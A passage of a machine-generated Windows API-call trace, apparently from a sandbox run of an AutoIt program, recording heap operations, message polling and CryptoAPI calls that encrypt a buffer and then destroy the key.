[0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.486] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c26a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.486] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.486] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.486] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.486] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.486] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.486] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.486] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.487] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0198.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.487] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.488] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.488] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.488] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.488] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.489] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x11e7e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x11e80) returned 1 [0198.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.489] CharLowerBuffW (in: lpsz="byte[73345]", cchLength=0xb | out: lpsz="byte[73345]") returned 0xb [0198.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.489] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.490] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.490] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa70e90*, pdwDataLen=0x87e820*=0x11e7e, dwBufLen=0x11e80 | out: pbData=0xa70e90*, pdwDataLen=0x87e820*=0x11e80) returned 1 [0198.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.491] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.491] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.491] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.491] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.491] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.491] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.491] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.491] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.491] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.491] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0198.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.503] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.507] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.507] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.507] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0198.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.508] CryptDestroyKey (hKey=0x90aed8) returned 1 [0198.508] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.508] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.508] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.508] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.508] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.508] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.508] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.508] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.508] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.509] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0198.509] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.509] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.509] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.509] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.509] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.509] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.509] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.509] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.509] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.509] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.509] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.509] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.510] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 